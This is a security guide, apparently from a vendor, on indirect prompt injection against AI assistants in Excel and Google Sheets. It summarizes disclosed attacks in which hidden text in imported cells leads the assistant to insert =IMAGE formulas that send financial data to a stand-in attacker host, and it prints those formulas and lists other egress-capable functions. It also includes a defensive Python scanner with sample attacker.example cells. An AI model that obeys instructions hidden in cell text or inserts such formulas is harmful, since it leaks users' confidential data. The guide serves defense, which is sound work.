AI in Excel and Google Sheets: Prompt Injection and Data Exfiltration Risks
Spreadsheets have a new attack surface: agentic AI assistants. A practitioner's guide to the indirect prompt injection risks across Excel and Sheets, covering disclosed exploits, vendor fixes, and what's still exposed.
Overview
Spreadsheets are the connective tissue of enterprise data: financial models, customer lists, vendor contracts, employee compensation, board materials. In the past two years, every major spreadsheet platform has shipped AI features, and a growing roster of third-party AI add-ons now runs alongside them: Claude for Excel, Microsoft Copilot in Excel, Google Gemini in Sheets, ChatGPT for Excel and Google Sheets, and standalone AI-native spreadsheet tools like Ramp Sheets are just a few that have hit the market.
PromptArmor has documented attack chains from deployed applications exfiltrating sensitive data through these features:
CellShock: Claude AI is Excel-lent at Stealing Data — an indirect prompt injection hidden in an imported reference dataset coerces Claude for Excel into inserting an =IMAGE("https://attacker/...?data=" & summarized_financials) formula and exfiltrating the victim's confidential financial model.
Ramp's Sheets AI Exfiltrates Financials — a near-identical attack against Ramp's AI-native spreadsheet, executed with no human-in-the-loop approval at all. Disclosed February 2026, resolved by Ramp on March 16, 2026.
The pattern is consistent across vendors and platforms (Anthropic, Ramp, OpenAI, Microsoft, Google): AI in spreadsheets is a novel class of prompt injection risk surface. This article maps that category and references the relevant OWASP risks (LLM01:2025 Prompt Injection from the OWASP Top 10 for LLM Applications 2025, and the OWASP Top 10 for Agentic Applications 2026).
The Threat Model
The root risk is indirect prompt injection — LLM01:2025 in the OWASP Top 10, amplified for agentic systems in the Agentic Top 10 — landing on a uniquely permissive attack surface.
Why spreadsheets are a uniquely dangerous host for AI
Three properties of spreadsheets compound prompt injection risk in ways most other AI integrations don't share.
1. Cell content arrives from untrusted upstream sources by default. Spreadsheets are designed to consume data from external places — imported CSVs, copy-pasted web ranges, exported reports from third-party SaaS, vendor-supplied templates, rows added via integrations and webhooks. Any AI feature that reads cell content treats all of this as part of the prompt, including content no human reviewer ever read closely.
2. AI features in spreadsheets take actions. They write formulas, modify ranges, generate scripts (Office Scripts, Apps Script), build pivots, and can even render images. The space of actions an injected agent can take inside a spreadsheet is wide — and several of those actions trigger external network requests by design.
3. Human-in-the-loop is often absent or too coarse to matter. When an AI inserts =IMAGE("https://attacker/exfil?data=" & SUMMARY(A1:Z100)), the user typically sees an "approve cell edit" prompt without the formula visible — or no prompt at all. Ramp's Sheets AI inserted formulas with no approval gate, and GPT for Excel and Sheets uses one-per-session edit approval that enables multiple future edits; Claude for Excel's first beta showed an "Add visualization" approval that hid the malicious URL until Anthropic improved the interstitial post-disclosure.
Likely sources of untrusted data
The common patterns we see in active investigations:
Imported reference datasets (industry benchmarks, market data, competitor pricing) copy-pasted from web sources or shared drives — the vector in both the CellShock and Ramp attack chains
Exported tables from internal SaaS (CRMs, ticketing, HRIS) where source apps allow free-text fields editable by vendors, customers, partners, or candidates
Email-to-row integrations that turn inbound emails into spreadsheet rows
Scraped content via IMPORTHTML, IMPORTXML, paste-special, or Apps Script
Vendor-supplied templates (RFP responses, due-diligence questionnaires) opened directly in the user's environment
Hidden text — white-on-white, one-pixel font, content concealed in unused columns — is the standard concealment technique and is what was used in both documented attack chains.
Actions an injected agent can take
Once injection lands, the high-impact action surface clusters into three areas:
Insert egress-capable formulas: =IMAGE(URL) (loads from URL), =WEBSERVICE(URL) (Excel), =IMPORTDATA(URL) / =IMPORTXML(URL) (Sheets), =HYPERLINK(URL,label) (becomes click-through), and Apps Script-resolvable custom functions. Combined with concatenated cell data, any of these is an exfiltration channel.
Write or modify cells across the workbook. Sensitive data from one sheet can be aggregated into the formula payload of another sheet that the user is unlikely to inspect.
Generate and run scripts. Office Scripts in Excel and Apps Script in Sheets execute with the user's identity, and in some cases can make API calls outside the document entirely. AI-generated Python in Excel (Advanced Analysis with Copilot) can be manipulated to programmatically aggregate data for exfiltration.
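A defender-side check for the egress-capable formulas listed above, as an added example that is not from the original article or any vendor: it flags formulas whose URL argument is computed from cell data rather than a fixed literal. The function names, sample cell addresses and .example hosts are constructed for illustration; SUMMARY is kept from the article's own formula.

```python
import re

# Functions the article names as able to reach an external URL.
EGRESS = ("IMAGE", "WEBSERVICE", "IMPORTDATA", "IMPORTXML", "IMPORTHTML", "HYPERLINK")
CALL_RE = re.compile(r"\b(" + "|".join(EGRESS) + r")\s*\(", re.IGNORECASE)
STRING_RE = re.compile(r'"(?:[^"]|"")*"')  # formula string literal; "" is an escaped quote
# A1-style cell or range reference, with optional $ anchors.
REF_RE = re.compile(r"(?<![\w])\$?[A-Za-z]{1,3}\$?\d+(?::\$?[A-Za-z]{1,3}\$?\d+)?(?![\w(])")

def first_arg(formula, i):
    """Return the first argument of the call whose '(' sits just before index i."""
    depth, in_str, start = 0, False, i
    while i < len(formula):
        ch = formula[i]
        if ch == '"':
            in_str = not in_str              # "" toggles twice, so state stays correct
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")" and depth == 0:
                break
            elif ch == ")":
                depth -= 1
            elif ch in ",;" and depth == 0:  # ';' is the separator in some locales
                break
        i += 1
    return formula[start:i].strip()

def scan_formula(formula):
    """List egress-capable calls; 'dynamic' means the URL is computed, not a fixed literal."""
    if not formula.startswith("="):
        return []
    # Blank out string contents (same length) so text inside quotes never looks like a call.
    masked = STRING_RE.sub(lambda m: '"' + " " * (len(m.group()) - 2) + '"', formula)
    findings = []
    for m in CALL_RE.finditer(masked):
        arg = first_arg(formula, m.end())
        bare = STRING_RE.sub("", arg)        # whatever is left outside string literals
        findings.append({"function": m.group(1).upper(), "url_arg": arg,
                         "dynamic": bool(bare.strip()), "refs": REF_RE.findall(bare)})
    return findings

def flag_workbook(cells):
    """cells maps 'Sheet!A1' -> formula text; return calls whose URL embeds computed data."""
    return [(addr, f) for addr, text in cells.items() for f in scan_formula(text) if f["dynamic"]]

# Constructed sample cells (hypothetical workbook; hosts use the reserved .example TLD).
SAMPLE = {
    "Benchmarks!H2": '=IMAGE("https://attacker.example/exfil?data=" & SUMMARY(A1:Z100))',
    "Summary!C1": '=IMAGE("https://static.example/logo.png")',
    "Summary!B4": "=SUM(Model!B2:B40)",
    "Notes!A9": '=HYPERLINK(Config!$B$1 & "?q=" & A2, "Open report")',
}
```

Run over formulas an assistant proposes to insert, or over formulas exported from an existing workbook, flag_workbook returns the cells where a network-reaching function receives a URL assembled from other cells, which are the ones to show in full to a human reviewer.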
Malware in spreadsheets: old problem, new surface
Spreadsheets have been a malware delivery vehicle for decades. Macro viruses, embedded executables, malicious add-in installers, and exploit-laden XLL files have all turned opening a workbook into running attacker code. Defenders responded by hardening the file format itself: blocking macros from internet-sourced files, sensitivity labeling, Trust Center deployment of approved templates, Mark of the Web enforcement, and disabling unsigned add-ins by default. CISA's standing alert on macro-based malware frames the lineage bluntly: "Microsoft Office applications use macros to automate routine tasks. However, macros can contain malicious code that can be used to exploit vulnerable systems."
AI features in spreadsheets are the same risk class on a new substrate. The malicious payload no longer has to be code — it can be plain text in a cell, processed by an AI agent that then chooses to take a malicious action on the user's behalf. Prompt injection makes any cell containing untrusted text potentially executable. The blast radius is wider than macros (any cell, by anyone with edit access, at any time after the file was created), and the existing macro-era controls (Mark of the Web, Trust Center, IRM, signed-macro policies) do not apply because the dangerous content is just text. This is a novel category of risk surface, recognizable across multiple unrelated vendor implementations.
Leading AI in Spreadsheet Tools and How They Mitigate Risk
Tools claiming AI spreadsheet functionality, ranked by research status
M365 sidebar add-in that reads multi-tab workbooks, edits cells, builds formulas, pivot tables, and full financial models.
First-party add-on for Excel and Google Sheets. Builds spreadsheets, edits formulas, gets insights across tabs, updates in real time.
AI-native web spreadsheet — upload Excel or CSV, parse bank statements, build financial models. Separate from the Ramp for Excel connector.
Native M365 AI in the Excel ribbon. Suggests and explains formulas, summarizes ranges, generates charts, PivotTables, and Python analysis.
Native Workspace AI. Generates table templates, summarizes and analyzes data in a side panel, and offers AI formula suggestions.
AI-native spreadsheet with built-in data integrations. Summarize, transform, and analyze data with AI directly inside the grid.
AI spreadsheet that connects to databases and APIs. Ask questions in plain English to query, transform, and visualize data.
AI-powered connector for Google Sheets and Excel. Pulls live data from CRMs, databases, and BI tools with natural-language commands.
AI data analyst — upload spreadsheets or connect data sources and ask Julius to analyze, chart, and generate insights conversationally.
AI formula add-in for Google Sheets. =AI() custom function lets users prompt GPT-4 from any cell to generate content, classify, or extract data.